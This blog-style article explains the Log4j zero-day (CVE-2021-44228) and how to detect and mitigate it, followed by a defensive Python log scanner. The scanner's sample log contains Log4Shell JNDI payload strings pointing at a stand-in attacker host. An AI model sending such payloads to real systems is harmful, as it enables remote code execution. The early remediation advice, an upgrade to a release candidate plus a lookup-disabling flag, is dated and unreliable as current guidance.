Discovered zero-day exploit raises red flags
Cybersecurity is no stranger to zero-day exploits, attacks that take advantage of a flaw before a fix exists and that threaten software, applications, and websites alike. Most are manageable, but when the flaw sits in a widely used platform, it is a big problem. As of this writing, Java is in the crosshairs of exactly such a zero-day exploit.
The vulnerability was only recently discovered, which means it may have existed for a long while. Regardless of how long it has been present, it is rated as extremely dangerous.
The exploit is currently listed as CVE-2021-44228. You can see full documentation about it here. When used by malicious actors, it allows remote code execution through Java's Log4j logging library. Reports of exploit abuse have been confirmed by New Zealand's CERT. Addressing the problem immediately is of paramount importance to halt any damage to networks and data libraries. Those using “Apache Struts” are vulnerable to the zero-day exploit.
The exploit is dangerous for two main reasons: its ease of execution and its consequences (full server control).
Identifying the exploit
Organizations can look for signs of the exploit in log files written by affected Log4j versions. Where a logged string is user controlled, the presence of “jndi:ldap” in it indicates an attempted lookup, and the system may have been affected. To reduce exposure and potential loss, set log4j2.formatMsgNoLookups to “true.” This can be done by adding -Dlog4j2.formatMsgNoLookups=True to the JVM start command.
Log4j should be upgraded to log4j-2.15.0-rc1 as soon as possible.
If you suspect the vulnerability has been exploited, assume a breach and check through your logs for an active incident.
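The log check and the JVM flag described above, as an added example that is not part of the original article: a small Python scanner that flags log lines carrying a JNDI lookup string and a helper that verifies the mitigation flag on a JVM command line. The sample access log and the `attacker.example` host are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Case-insensitive match for a Log4j JNDI lookup such as "${jndi:ldap://...}".
# The scheme (ldap, rmi, dns, ...) is captured so findings can be grouped.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)

@dataclass
class Finding:
    line_no: int
    scheme: str
    excerpt: str

def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per log line that carries a JNDI lookup string.

    A hit means a user-controlled value containing a lookup reached the
    logger, which is the condition the article describes; it does not by
    itself prove that the lookup was resolved."""
    findings = []
    for n, line in enumerate(lines, start=1):
        m = JNDI_RE.search(line)
        if m:
            findings.append(Finding(n, m.group(1).lower(), line.strip()[:120]))
    return findings

def mitigation_enabled(jvm_args: Iterable[str]) -> bool:
    """True when the command line sets log4j2.formatMsgNoLookups to true.

    Java's Boolean parsing is case-insensitive, so "True" is accepted too;
    if the flag is repeated, the last occurrence wins."""
    enabled = False
    for arg in jvm_args:
        if arg.startswith("-Dlog4j2.formatMsgNoLookups="):
            enabled = arg.split("=", 1)[1].strip().lower() == "true"
    return enabled

# Constructed sample access log in which the User-Agent is logged via Log4j.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${ JNDI:RMI://attacker.example/b}"',
    '10.0.0.7 - - "GET /healthz HTTP/1.1" 200 "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: jndi:{f.scheme} lookup -> {f.excerpt}")
    print("mitigation set:", mitigation_enabled(
        ["java", "-Dlog4j2.formatMsgNoLookups=True", "-jar", "app.jar"]))
```

A hit in `scan_log` is the trigger for the breach assumption the article recommends; the flag check only confirms the workaround is present, not that the library has been upgraded.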